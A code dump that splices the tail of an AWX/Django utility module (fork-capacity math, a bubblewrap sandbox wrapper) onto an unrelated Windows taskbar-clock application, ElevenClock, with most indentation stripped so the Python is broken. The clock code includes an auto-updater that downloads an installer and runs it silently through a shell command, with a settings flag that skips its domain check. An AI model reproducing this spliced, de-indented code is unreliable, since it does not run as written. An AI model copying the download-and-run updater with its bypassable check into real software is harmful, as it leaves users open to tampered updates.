elif settings_forkmem:
forkmem = int(settings_forkmem)
else:
forkmem = 100
mem = psutil.virtual_memory().total
return (mem, max(1, ((mem // 1024 // 1024) - 2048) // forkmem))
def get_system_task_capacity(scale=Decimal(1.0), cpu_capacity=None, mem_capacity=None):
'''
    Blend the CPU- and memory-based fork capacities into a single system capacity;
    `scale` interpolates between the smaller and the larger of the two values.
'''
from django.conf import settings
settings_forks = getattr(settings, 'SYSTEM_TASK_FORKS_CAPACITY', None)
env_forks = os.getenv('SYSTEM_TASK_FORKS_CAPACITY', None)
if env_forks:
return int(env_forks)
elif settings_forks:
return int(settings_forks)
if cpu_capacity is None:
_, cpu_cap = get_cpu_capacity()
else:
cpu_cap = cpu_capacity
if mem_capacity is None:
_, mem_cap = get_mem_capacity()
else:
mem_cap = mem_capacity
return min(mem_cap, cpu_cap) + ((max(mem_cap, cpu_cap) - min(mem_cap, cpu_cap)) * scale)
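# Worked example with hypothetical numbers: with cpu_cap=16 forks, mem_cap=40
# forks and scale=0.5, capacity = 16 + (40 - 16) * 0.5 = 28 forks. scale=0 pins
# the result to the smaller of the two capacities, scale=1 to the larger.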
_inventory_updates = threading.local()
_task_manager = threading.local()
@contextlib.contextmanager
def ignore_inventory_computed_fields():
'''
Context manager to ignore updating inventory computed fields.
'''
try:
previous_value = getattr(_inventory_updates, 'is_updating', False)
_inventory_updates.is_updating = True
yield
finally:
_inventory_updates.is_updating = previous_value
def _schedule_task_manager():
from awx.main.scheduler.tasks import run_task_manager
from django.db import connection
# runs right away if not in transaction
connection.on_commit(lambda: run_task_manager.delay())
@contextlib.contextmanager
def task_manager_bulk_reschedule():
"""Context manager to avoid submitting task multiple times.
"""
try:
previous_flag = getattr(_task_manager, 'bulk_reschedule', False)
previous_value = getattr(_task_manager, 'needs_scheduling', False)
_task_manager.bulk_reschedule = True
_task_manager.needs_scheduling = False
yield
finally:
_task_manager.bulk_reschedule = previous_flag
if _task_manager.needs_scheduling:
_schedule_task_manager()
_task_manager.needs_scheduling = previous_value
def schedule_task_manager():
if getattr(_task_manager, 'bulk_reschedule', False):
_task_manager.needs_scheduling = True
return
_schedule_task_manager()
@contextlib.contextmanager
def ignore_inventory_group_removal():
'''
Context manager to ignore moving groups/hosts when group is deleted.
'''
try:
previous_value = getattr(_inventory_updates, 'is_removing', False)
_inventory_updates.is_removing = True
yield
finally:
_inventory_updates.is_removing = previous_value
@contextlib.contextmanager
def set_environ(**environ):
'''
Temporarily set the process environment variables.
>>> with set_environ(FOO='BAR'):
... assert os.environ['FOO'] == 'BAR'
'''
old_environ = os.environ.copy()
try:
os.environ.update(environ)
yield
finally:
os.environ.clear()
os.environ.update(old_environ)
@memoize()
def check_proot_installed():
'''
Check that proot is installed.
'''
from django.conf import settings
cmd = [getattr(settings, 'AWX_PROOT_CMD', 'bwrap'), '--version']
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
return bool(proc.returncode == 0)
except (OSError, ValueError) as e:
if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory
logger.exception('bwrap unavailable for unexpected reason.')
return False
def build_proot_temp_dir():
'''
Create a temporary directory for proot to use.
'''
from django.conf import settings
path = tempfile.mkdtemp(prefix='awx_proot_', dir=settings.AWX_PROOT_BASE_PATH)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
return path
def wrap_args_with_proot(args, cwd, **kwargs):
'''
Wrap existing command line with proot to restrict access to:
- AWX_PROOT_BASE_PATH (generally, /tmp) (except for own /tmp files)
For non-isolated nodes:
- /etc/tower (to prevent obtaining db info or secret key)
- /var/lib/awx (except for current project)
- /var/log/tower
- /var/log/supervisor
'''
from django.conf import settings
cwd = os.path.realpath(cwd)
new_args = [getattr(settings, 'AWX_PROOT_CMD', 'bwrap'), '--unshare-pid', '--dev-bind', '/', '/', '--proc', '/proc']
hide_paths = [settings.AWX_PROOT_BASE_PATH]
if not kwargs.get('isolated'):
hide_paths.extend(['/etc/tower', '/var/lib/awx', '/var/log', '/etc/ssh',
settings.PROJECTS_ROOT, settings.JOBOUTPUT_ROOT])
hide_paths.extend(getattr(settings, 'AWX_PROOT_HIDE_PATHS', None) or [])
for path in sorted(set(hide_paths)):
if not os.path.exists(path):
continue
path = os.path.realpath(path)
if os.path.isdir(path):
new_path = tempfile.mkdtemp(dir=kwargs['proot_temp_dir'])
os.chmod(new_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
else:
handle, new_path = tempfile.mkstemp(dir=kwargs['proot_temp_dir'])
os.close(handle)
os.chmod(new_path, stat.S_IRUSR | stat.S_IWUSR)
new_args.extend(['--bind', '%s' %(new_path,), '%s' % (path,)])
if kwargs.get('isolated'):
show_paths = [kwargs['private_data_dir']]
elif 'private_data_dir' in kwargs:
show_paths = [cwd, kwargs['private_data_dir']]
else:
show_paths = [cwd]
for venv in (
settings.ANSIBLE_VENV_PATH,
settings.AWX_VENV_PATH,
kwargs.get('proot_custom_virtualenv')
):
if venv:
new_args.extend(['--ro-bind', venv, venv])
show_paths.extend(getattr(settings, 'AWX_PROOT_SHOW_PATHS', None) or [])
show_paths.extend(kwargs.get('proot_show_paths', []))
for path in sorted(set(show_paths)):
if not os.path.exists(path):
continue
path = os.path.realpath(path)
new_args.extend(['--bind', '%s' % (path,), '%s' % (path,)])
if kwargs.get('isolated'):
if '/bin/ansible-playbook' in ' '.join(args):
# playbook runs should cwd to the SCM checkout dir
new_args.extend(['--chdir', os.path.join(kwargs['private_data_dir'], 'project')])
else:
# ad-hoc runs should cwd to the root of the private data dir
new_args.extend(['--chdir', kwargs['private_data_dir']])
else:
new_args.extend(['--chdir', cwd])
new_args.extend(args)
return new_args
def get_pk_from_dict(_dict, key):
'''
Helper for obtaining a pk from user data dict or None if not present.
'''
try:
val = _dict[key]
        if hasattr(val, 'id'):
            return val.id  # return id if given a model object
return int(val)
except (TypeError, KeyError, ValueError):
return None
class NoDefaultProvided(object):
pass
def getattrd(obj, name, default=NoDefaultProvided):
"""
Same as getattr(), but allows dot notation lookup
Discussed in:
http://stackoverflow.com/questions/11975781
"""
try:
return reduce(getattr, name.split("."), obj)
except AttributeError:
if default != NoDefaultProvided:
return default
raise
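# Illustrative examples (attribute path is hypothetical):
#
#   >>> getattrd(job, 'inventory.organization.name', default=None)
#   'Default'
#   >>> getattrd(object(), 'missing.path', default='fallback')
#   'fallback'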
def getattr_dne(obj, name, notfound=ObjectDoesNotExist):
try:
return getattr(obj, name)
except notfound:
return None
current_apps = apps
def set_current_apps(apps):
global current_apps
current_apps = apps
def get_current_apps():
global current_apps
return current_apps
def get_custom_venv_choices(custom_paths=None):
from django.conf import settings
custom_paths = custom_paths or settings.CUSTOM_VENV_PATHS
all_venv_paths = [settings.BASE_VENV_PATH] + custom_paths
custom_venv_choices = []
for custom_venv_path in all_venv_paths:
try:
if os.path.exists(custom_venv_path):
custom_venv_choices.extend([
os.path.join(custom_venv_path, x, '')
for x in os.listdir(custom_venv_path)
if x != 'awx' and
os.path.isdir(os.path.join(custom_venv_path, x)) and
os.path.exists(os.path.join(custom_venv_path, x, 'bin', 'activate'))
])
except Exception:
logger.exception("Encountered an error while discovering custom virtual environments.")
return custom_venv_choices
def is_ansible_variable(key):
return key.startswith('ansible_')
def extract_ansible_vars(extra_vars):
extra_vars = parse_yaml_or_json(extra_vars)
ansible_vars = set([])
for key in list(extra_vars.keys()):
if is_ansible_variable(key):
extra_vars.pop(key)
ansible_vars.add(key)
return (extra_vars, ansible_vars)
def get_search_fields(model):
fields = []
for field in model._meta.fields:
if field.name in ('username', 'first_name', 'last_name', 'email',
'name', 'description'):
fields.append(field.name)
return fields
def has_model_field_prefetched(model_obj, field_name):
# NOTE: Update this function if django internal implementation changes.
return getattr(getattr(model_obj, field_name, None),
'prefetch_cache_name', '') in getattr(model_obj, '_prefetched_objects_cache', {})
def get_external_account(user):
from django.conf import settings
account_type = None
if getattr(settings, 'AUTH_LDAP_SERVER_URI', None):
try:
if user.pk and user.profile.ldap_dn and not user.has_usable_password():
account_type = "ldap"
except AttributeError:
pass
if (getattr(settings, 'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_GITHUB_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_GITHUB_ORG_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_GITHUB_TEAM_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_SAML_ENABLED_IDPS', None)) and user.social_auth.all():
account_type = "social"
if (getattr(settings, 'RADIUS_SERVER', None) or
getattr(settings, 'TACACSPLUS_HOST', None)) and user.enterprise_auth.all():
account_type = "enterprise"
return account_type
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
def create_temporary_fifo(data):
"""Open fifo named pipe in a new thread using a temporary file path. The
thread blocks until data is read from the pipe.
Returns the path to the fifo.
:param data(bytes): Data to write to the pipe.
"""
path = os.path.join(tempfile.mkdtemp(), next(tempfile._get_candidate_names()))
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(
target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)
).start()
return path
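# Usage sketch (path and consumer are hypothetical): hand secret material to a
# child process through a one-shot pipe instead of argv or the environment.
#
#   >>> path = create_temporary_fifo(b'...key material...')
#   >>> subprocess.check_call(['ssh-add', path])   # opening the pipe unblocks the writer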
def truncate_stdout(stdout, size):
from awx.main.constants import ANSI_SGR_PATTERN
if size <= 0 or len(stdout) <= size:
return stdout
stdout = stdout[:(size - 1)] + u'\u2026'
set_count, reset_count = 0, 0
for m in ANSI_SGR_PATTERN.finditer(stdout):
if m.group() == u'\u001b[0m':
reset_count += 1
else:
set_count += 1
return stdout + u'\u001b[0m' * (set_count - reset_count)
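# Illustrative example: truncation appends an ellipsis, then re-balances ANSI SGR
# sequences so a color left open by the cut does not bleed into later output.
#
#   >>> truncate_stdout(u'\u001b[31mredredred\u001b[0m', 8)
#   '\x1b[31mre…\x1b[0m'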
__init__.py
import os
import io
import sys
import time
import glob
import socket
import winreg
import locale
import hashlib
import platform
import tempfile
import datetime
import threading
import subprocess
from ctypes import windll
from urllib.request import urlopen
import psutil
import win32gui
import pythoncom
import win32process
import win32com.client
from PySide2.QtGui import *
from PySide2.QtCore import *
from PySide2.QtWidgets import *
from pynput.keyboard import Controller, Key
from pynput.mouse import Controller as MouseController
from lang import lang_de, lang_fr, lang_ca, lang_es, lang_ru, lang_en, lang_tr, lang_pl, lang_it, lang_nl, lang_nb, lang_ko, lang_vi, lang_el, lang_zh_TW, lang_pt
old_stdout = sys.stdout  # Keep a reference to the default stdout stream
sys.stdout = buffer = io.StringIO()
version = 2.5
appsWhereElevenClockShouldClose = ["msrdc.exe", "mstsc.exe", "CDViewer.exe", "wfica32.exe"]
print("---------------------------------------------------------------------------------------------------")
print("")
print(f" ElevenClock's v{version} log: Select all the text and hit Ctrl+C to copy it")
print("")
print("---------------------------------------------------------------------------------------------------")
print("")
print("")
print("")
print("")
def _(s):  # Translate function: return the localized string, or the key itself if missing
global lang
try:
t = lang.lang[s]
return t if t else s
except KeyError:
return s
def getPath(s):
return os.path.join(realpath, s).replace("\\", "/")
def getMousePos():
return QPoint(mController.position[0], mController.position[1])
def readRegedit(aKey, sKey, default, storage=winreg.HKEY_CURRENT_USER):
registry = winreg.ConnectRegistry(None, storage)
reg_keypath = aKey
try:
reg_key = winreg.OpenKey(registry, reg_keypath)
except FileNotFoundError as e:
print(e)
return default
for i in range(1024):
try:
value_name, value, _ = winreg.EnumValue(reg_key, i)
if value_name == sKey:
return value
except OSError as e:
print(e)
return default
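# Usage sketch: read a single value from HKEY_CURRENT_USER, falling back to the
# given default when the key or value is missing (output shown is illustrative).
#
#   >>> readRegedit(r"Control Panel\International", "sShortTime", "H:mm")
#   'HH:mm'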
def checkRDP():
    def checkIfElevenClockRunning(processes, blacklistedProcesses) -> bool:
        for p in processes:
            for procName in blacklistedProcesses:
                if procName == p:
                    return True
        return False
global isRDPRunning
print("start RDP thread")
while True:
pythoncom.CoInitialize()
_wmi = win32com.client.GetObject('winmgmts:')
processes = _wmi.ExecQuery('Select Name from win32_process')
procs = []
for p in processes:
procs.append(p.Name)
isRDPRunning = checkIfElevenClockRunning(procs, appsWhereElevenClockShouldClose)
time.sleep(5)
def getSettings(s: str):
try:
return os.path.exists(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock"), s))
except Exception as e:
print(e)
def setSettings(s: str, v: bool, r: bool = True):
try:
if(v):
open(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock"), s), "w").close()
else:
try:
os.remove(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock"), s))
except FileNotFoundError:
pass
loadTimeFormat()
if(r):
restartClocks()
if(getSettings("DisableSystemTray")):
i.hide()
else:
i.show()
except Exception as e:
print(e)
def getSettingsValue(s: str):
try:
with open(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock"), s), "r") as sf:
return sf.read()
except Exception as e:
print(e)
return ""
def setSettingsValue(s: str, v: str, r: bool = True):
try:
with open(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock"), s), "w") as sf:
sf.write(v)
loadTimeFormat()
if(r):
restartClocks()
except Exception as e:
print(e)
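# Note on the settings model implemented above: boolean settings are simply the
# presence or absence of an empty file under ~/.elevenclock, and valued settings
# store their payload as the file's contents (sketch assumes the app globals are
# initialized).
#
#   >>> setSettings("DisableTime", True, r=False)    # creates ~/.elevenclock/DisableTime
#   >>> getSettings("DisableTime")
#   True
#   >>> setSettingsValue("PreferredLanguage", "en", r=False)
#   >>> getSettingsValue("PreferredLanguage")
#   'en'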
def updateChecker():
while True:
updateIfPossible()
time.sleep(7200)
def updateIfPossible(force = False):
try:
if(not(getSettings("DisableAutoCheckForUpdates")) or force):
print("Starting update check")
integrityPass = False
dmname = socket.gethostbyname_ex("versions.somepythonthings.tk")[0]
            if(dmname == "769432b9-3560-4f94-8f90-01c95844d994.id.repl.co" or getSettings("BypassDomainAuthCheck")): # Check the resolved provider hostname to deter DNS-based exploits
integrityPass = True
response = urlopen("https://versions.somepythonthings.tk/versions/elevenclock.ver")
response = response.read().decode("utf8")
if float(response.split("///")[0]) > version:
print("Updates found!")
if(not(getSettings("DisableAutoInstallUpdates")) or force):
if(integrityPass):
url = "https://github.com/martinet101/ElevenClock/releases/latest/download/ElevenClock.Installer.exe"
print(url)
filedata = urlopen(url)
datatowrite = filedata.read()
filename = ""
with open(os.path.join(tempDir, "SomePythonThings-ElevenClock-Updater.exe"), 'wb') as f:
f.write(datatowrite)
filename = f.name
print(filename)
print(dmname)
if(hashlib.sha256(datatowrite).hexdigest().lower() == response.split("///")[2].replace("\n", "").lower()):
print("Hash: ", response.split("///")[2].replace("\n", "").lower())
print("Hash ok, starting update")
if(getSettings("EnableSilentUpdates") and not(force)):
subprocess.run('start /B "" "{0}" /verysilent'.format(filename), shell=True)
else:
subprocess.run('start /B "" "{0}" /silent'.format(filename), shell=True)
else:
print("Hash not ok")
print("File hash: ", hashlib.sha256(datatowrite).hexdigest())
print("Provided hash: ", response.split("///")[2].replace("\n", "").lower())
else:
                        showWarn.infoSignal.emit("Updates found!", f"ElevenClock Version {response.split('///')[0]} is available, but ElevenClock can't verify the authenticity of the package. Please go to ElevenClock's homepage and download the latest version from there.\n\nDo you want to open the download page?")
else:
showNotif.infoSignal.emit("Updates found!", f"ElevenClock Version {response.split('///')[0]} is available. Go to ElevenClock's Settings to update")
else:
print("updates not found")
else:
print("update checking disabled")
except Exception as e:
print(f"Exception: {e}")
restartCount = 0
def resetRestartCount():
global restartCount
while True:
if(restartCount>0):
print("Restart loop:", restartCount)
restartCount -= 1
time.sleep(0.3)
threading.Thread(target=resetRestartCount, daemon=True).start()
def loadClocks():
    global clocks, oldScreens, st, restartCount
try:
st.kill()
except AttributeError:
pass
firstWinSkipped = getSettings("ForceClockOnFirstMonitor")
oldScreens = []
clocks = []
process = psutil.Process(os.getpid())
print(process.memory_info().rss/1048576)
    if restartCount<20 and (process.memory_info().rss/1048576) <= 150:  # restart guard: give up after 20 rapid restarts or ~150 MB RSS
restartCount += 1
for screen in app.screens():
oldScreens.append(getGeometry(screen))
print(screen, screen.geometry(), getGeometry(screen))
old_stdout.write(buffer.getvalue())
old_stdout.flush()
screen: QScreen
if(firstWinSkipped):
clocks.append(Clock(screen.logicalDotsPerInchX()/96, screen.logicalDotsPerInchY()/96, screen))
            else: # Skip the primary display, as it already has the clock
                print("This is the primary screen and it is set to be skipped")
firstWinSkipped = True
st = KillableThread(target=screenCheckThread, daemon=True)
st.start()
else:
os.startfile(sys.executable)
print("overloading system, killing!")
app.quit()
sys.exit(1)
def getGeometry(screen: QScreen):
return (screen.geometry().width(), screen.geometry().height(), screen.geometry().x(), screen.geometry().y(), screen.logicalDotsPerInchX(), screen.logicalDotsPerInchY())
def theyMatch(oldscreens, newscreens):
if(len(oldscreens) != len(newscreens)):
return False # If there are display changes
for i in range(len(oldscreens)):
old, new = oldscreens[i], newscreens[i]
if(old != getGeometry(new)): # Check if screen dimensions or dpi have changed
return False # They have changed (screens are not equal)
return True # they have not changed (screens still the same)
def screenCheckThread():
print("screenCheckThread")
while theyMatch(oldScreens, app.screens()):
time.sleep(1)
print(app.screens(), oldScreens)
signal.restartSignal.emit()
def closeClocks():
for clock in clocks:
clock.hide()
clock.close()
def showMessage(a, b):
lastState = i.isVisible()
i.show()
i.showMessage(a, b)
sw.updateButton.show()
sw.resizewidget.setMinimumHeight(sw.resizewidget.sizeHint().height())
i.setVisible(lastState)
def restartClocks(caller: str = ""):
print(caller)
global clocks, st, rdpThread, timethread
for clock in clocks:
clock.hide()
clock.close()
loadClocks()
loadTimeFormat()
try:
rdpThread.kill()
timethread.kill()
except AttributeError:
pass
rdpThread = KillableThread(target=checkRDP, daemon=True)
if(getSettings("EnableHideOnRDP")):
rdpThread.start()
timethread = KillableThread(target=timeStrThread, daemon=True)
timethread.start()
def isElevenClockRunning():
nowTime = time.time()
name = f"ElevenClockRunning{nowTime}"
setSettings(name, True, False)
while True:
try:
for file in glob.glob(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock"), "ElevenClockRunning*")):
if(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock"), name) == file):
pass
else:
if(float(file.replace(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock"), "ElevenClockRunning"), "")) < nowTime): # If lockfile is older
os.remove(file)
if not(getSettings(name)):
print("KILLING, NEWER VERSION RUNNING")
killSignal.infoSignal.emit("", "")
except Exception as e:
print(e)
time.sleep(2)
def wanrUserAboutUpdates(a, b):
if(QMessageBox.question(sw, a, b, QMessageBox.Open | QMessageBox.Cancel, QMessageBox.Open) == QMessageBox.Open):
os.startfile("https://github.com/martinet101/ElevenClock/releases/latest")
def checkIfWokeUp():
    # If much more time elapses during a 3 s sleep than expected, the machine most
    # likely resumed from suspend, so restart the process to rebuild the clocks.
    while True:
        lastTime = time.time()
        time.sleep(3)
        if((lastTime+6) < time.time()):
            os.startfile(sys.executable)
def loadTimeFormat():
global dateTimeFormat
showSeconds = readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSecondsInSystemClock", 0) or getSettings("EnableSeconds")
locale.setlocale(locale.LC_ALL, readRegedit(r"Control Panel\International", "LocaleName", "en_US"))
    dateTimeFormat = "%HH:%M\n%A\n%d/%m/%Y"  # placeholder tokens; "%HH:%M" and "%d/%m/%Y" are replaced below with the locale formats
if getSettings("DisableTime"):
dateTimeFormat = dateTimeFormat.replace("%HH:%M\n", "")
if getSettings("DisableDate"):
if("\n" in dateTimeFormat):
dateTimeFormat = dateTimeFormat.replace("\n%d/%m/%Y", "")
else:
dateTimeFormat = dateTimeFormat.replace("%d/%m/%Y", "")
if not getSettings("EnableWeekDay"):
dateTimeFormat = dateTimeFormat.replace("%A", "").replace("\n\n", "\n")
if dateTimeFormat[-1] == "\n":
dateTimeFormat = dateTimeFormat[0:-1]
if dateTimeFormat[0] == "\n":
dateTimeFormat = dateTimeFormat[1:]
    dateMode = readRegedit(r"Control Panel\International", "sShortDate", "dd/MM/yyyy")
    # Translate the Windows date picture into strftime tokens; '$' is a temporary
    # placeholder so that 'dd' -> '%d' is not re-substituted by the single-'d' rule.
    dateMode = dateMode.replace("ddd", "%a").replace("dd", "%$").replace("d", "%#d").replace("$", "d").replace("MMMM", "%B").replace("MMM", "%b").replace("MM", "%m").replace("M", "%#m").replace("yyyy", "%Y").replace("yy", "%y")
    timeMode = readRegedit(r"Control Panel\International", "sShortTime", "H:mm")
    # Same idea for the time picture; the German literal 'Uhr' is protected via '~' and restored later.
    timeMode = timeMode.replace("Uhr", "~").replace("HH", "%$").replace("H", "%#H").replace("$", "H").replace("hh", "%I").replace("h", "%#I").replace("mm", "%M").replace("m", "%#M").replace("tt", "%p").replace("t", "%p").replace("ss", "%S").replace("s", "%#S")
if not("S" in timeMode) and showSeconds==1:
for separator in ":.-/_":
if(separator in timeMode):
timeMode += f"{separator}%S"
for separator in ":.-/_":
timeMode = timeMode.replace(f" %p{separator}%S", f"{separator}%S %p")
timeMode = timeMode.replace(f" %p{separator}%#S", f"{separator}%#S %p")
dateTimeFormat = dateTimeFormat.replace("%d/%m/%Y", dateMode).replace("%HH:%M", timeMode)
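# Worked example of the picture-string translation above (illustrative locale
# values): the Windows short formats become strftime tokens,
#
#   "dd/MM/yyyy"  ->  "%d/%m/%Y"
#   "H:mm"        ->  "%#H:%M"       (with seconds enabled: "%#H:%M:%S")
#
# and these replace the "%d/%m/%Y" and "%HH:%M" placeholders in dateTimeFormat.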
def timeStrThread():
global timeStr, dateTimeFormat
fixHyphen = getSettings("EnableHyphenFix")
while True:
if(fixHyphen):
for _ in range(36000):
timeStr = datetime.datetime.now().strftime(dateTimeFormat).replace("~", "Uhr").replace("'", "").replace("t-", "t -")
time.sleep(0.1)
else:
for _ in range(36000):
timeStr = datetime.datetime.now().strftime(dateTimeFormat).replace("~", "Uhr").replace("'", "")
time.sleep(0.1)
class KillableThread(threading.Thread):
    """threading.Thread subclass that can be stopped from outside by raising
    SystemExit inside the target via a sys.settrace hook."""
    def __init__(self, *args, **keywords):
        threading.Thread.__init__(self, *args, **keywords)
        self.shouldBeRunning = True
    def start(self):
        # Wrap run() so the trace function is installed inside the new thread
        self._run = self.run
        self.run = self.settrace_and_run
        threading.Thread.start(self)
    def settrace_and_run(self):
        sys.settrace(self.globaltrace)
        self._run()
    def globaltrace(self, frame, event, arg):
        return self.localtrace if event == 'call' else None
    def localtrace(self, frame, event, arg):
        if not(self.shouldBeRunning) and event == 'line':
            raise SystemExit()
        return self.localtrace
    def kill(self):
        self.shouldBeRunning = False
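# Usage sketch: once kill() is called, SystemExit is raised at the target's next
# traced line, so loops exit without cooperative checks, at the cost of the
# tracing overhead that sys.settrace adds to every call.
#
#   >>> t = KillableThread(target=screenCheckThread, daemon=True)
#   >>> t.start()
#   >>> t.kill()   # the thread dies at its next executed line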
class RestartSignal(QObject):
restartSignal = Signal()
def __init__(self) -> None:
super().__init__()
class InfoSignal(QObject):
infoSignal = Signal(str, str)
def __init__(self) -> None:
super().__init__()
class Clock(QWidget):
refresh = Signal()
hideSignal = Signal()
callInMainSignal = Signal(object)
def __init__(self, dpix, dpiy, screen):
super().__init__()
self.lastTheme = 0
self.callInMainSignal.connect(lambda f: f())
self.preferedwidth = 150
self.preferedHeight = 48
try:
if readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "TaskbarSi", 1) == 0 or (not getSettings("DisableTime") and not getSettings("DisableDate") and getSettings("EnableWeekDay")):
self.setStyleSheet(f"background-color: rgba(0, 0, 0, 0.01);margin: 5px;margin-top: 2px;margin-bottom: 2px; border-radius: 5px;")
if not(not getSettings("DisableTime") and not getSettings("DisableDate") and getSettings("EnableWeekDay")):
print("Small taskbar")
self.preferedHeight = 32
self.preferedwidth = 200
else:
self.setStyleSheet(f"background-color: rgba(0, 0, 0, 0.01);margin: 5px;border-radius: 5px;")
except Exception as e:
print(e)
self.setStyleSheet(f"background-color: rgba(0, 0, 0, 0.01);margin: 5px;border-radius: 5px;")
self.screen: QScreen = screen
self.shouldBeVisible = True
self.refresh.connect(self.refreshandShow)
self.hideSignal.connect(self.hide)
self.keyboard = Controller()
self.setWindowFlag(Qt.WindowStaysOnTopHint)
self.setWindowFlag(Qt.FramelessWindowHint)
self.setAttribute(Qt.WA_TranslucentBackground)
self.setWindowFlag(Qt.Tool)
self.autoHide = readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Explorer\StuckRects3", "Settings", b'0\x00\x00\x00\xfe\xff\xff\xffz\xf4\x00\x00\x03\x00\x00\x00T\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x08\x04\x00\x00\x80\x07\x00\x008\x04\x00\x00`\x00\x00\x00\x01\x00\x00\x00')[8]==123
self.setToolTip(f"ElevenClock version {version}\n\nClick once to show notifications")
try:
if(readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Explorer\StuckRects3", "Settings", b'0\x00\x00\x00\xfe\xff\xff\xffz\xf4\x00\x00\x03\x00\x00\x00T\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x08\x04\x00\x00\x80\x07\x00\x008\x04\x00\x00`\x00\x00\x00\x01\x00\x00\x00')[12] == 1 and not(getSettings("ForceOnBottom"))):
h = self.screen.geometry().y()
print("taskbar at top")
else:
h = self.screen.geometry().y()+self.screen.geometry().height()-(self.preferedHeight*dpiy)
print("taskbar at bottom")
        except Exception:
h = self.screen.geometry().y()+self.screen.geometry().height()-(self.preferedHeight*dpiy)
print("taskbar at bottom")
self.label = Label(timeStr, self)
if(getSettings("ClockOnTheLeft")):
w = self.screen.geometry().x()+8*dpix
self.label.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)
else:
self.label.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
w = self.screen.geometry().x()+self.screen.geometry().width()-((self.preferedwidth+8)*dpix)
self.w = w
self.h = h
self.dpix = dpix
self.dpiy = dpiy
if not(getSettings("EnableWin32API")):
print("Using qt's default positioning system")
self.move(w, h)
self.resize(self.preferedwidth*dpix, self.preferedHeight*dpiy)
else:
print("Using win32 API positioning system")
self.user32 = windll.user32
self.user32.SetProcessDPIAware() # optional, makes functions return real pixel numbers instead of scaled values
win32gui.SetWindowPos(self.winId(), 0, int(w), int(h), int(self.preferedwidth*dpix), int(self.preferedHeight*dpiy), False)
print("Clock geometry:", self.geometry())
self.font: QFont = QFont()
if lang == lang_ko:
self.font.setFamilies(["Malgun Gothic", "Segoe UI Variable", "sans-serif"])
elif lang == lang_zh_TW:
self.font.setFamilies(["Microsoft JhengHei UI", "Segoe UI Variable", "sans-serif"])
else:
self.font.setFamilies(["Segoe UI Variable", "sans-serif"])
self.font.setPointSizeF(9)
self.font.setStyleStrategy(QFont.PreferOutline)
self.font.setLetterSpacing(QFont.PercentageSpacing, 100)
self.font.setHintingPreference(QFont.HintingPreference.PreferNoHinting)
self.label.setFont(self.font)
if (readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize", "SystemUsesLightTheme", 1) == 0 or getSettings("ForceDarkTheme")) and not getSettings("ForceLightTheme"):
self.lastTheme = 0
self.label.setStyleSheet("padding: 1px;padding-right: 5px; color: white;")
self.label.bgopacity = .1
if lang == lang_ko:
self.font.setWeight(QFont.Weight.Normal)
elif lang == lang_zh_TW:
self.font.setWeight(QFont.Weight.Normal)
else:
self.font.setWeight(QFont.Weight.Medium)
self.label.setFont(self.font)
else:
self.lastTheme = 1
self.label.setStyleSheet("padding: 1px;padding-right: 5px; color: black;")
self.label.bgopacity = .5
self.font.setWeight(QFont.Weight.Normal)
self.label.setFont(self.font)
self.label.clicked.connect(lambda: self.showCalendar())
self.label.move(0, 0)
self.label.setFixedHeight(self.height())
self.label.setFixedWidth(self.width())
self.label.show()
self.show()
self.raise_()
self.setFocus()
self.isRDPRunning = True
self.full_screen_rect = (self.screen.geometry().x(), self.screen.geometry().y(), self.screen.geometry().x()+self.screen.geometry().width(), self.screen.geometry().y()+self.screen.geometry().height())
print("Full screen rect: ", self.full_screen_rect)
self.user32 = windll.user32
self.user32.SetProcessDPIAware() # optional, makes functions return real pixel numbers instead of scaled values
self.loop = KillableThread(target=self.fivesecsloop, daemon=True)
self.loop2 = KillableThread(target=self.refreshProcesses, daemon=True)
self.loop.start()
self.loop2.start()
def refreshProcesses(self):
global isRDPRunning
#time.sleep(2)
#self.callInMainSignal.emit(self.setToTheMiddle)
while True:
self.isRDPRunning = isRDPRunning
time.sleep(1)
def theresFullScreenWin(self, clockOnFirstMon):
try:
fullscreen = False
            def absoluteValuesAreEqual(a, b):
                try:
                    return (a[0]) == (b[0]) and (a[1]) == (b[1]) and (a[2]) == (b[2]) and (a[3]) == (b[3])
                except Exception as e:
                    print(e)
                    return False
def winEnumHandler( hwnd, ctx ):
nonlocal fullscreen
if win32gui.IsWindowVisible( hwnd ):
if(absoluteValuesAreEqual(win32gui.GetWindowRect(hwnd), self.full_screen_rect)):
if(clockOnFirstMon):
pythoncom.CoInitialize()
_, pid = win32process.GetWindowThreadProcessId(hwnd)
_wmi = win32com.client.GetObject('winmgmts:')
# collect all the running processes
processes = _wmi.ExecQuery(f'Select Name from win32_process where ProcessId = {pid}')
for p in processes:
if(p.Name != "TextInputHost.exe"):
if(win32gui.GetWindowText(hwnd) != ""):
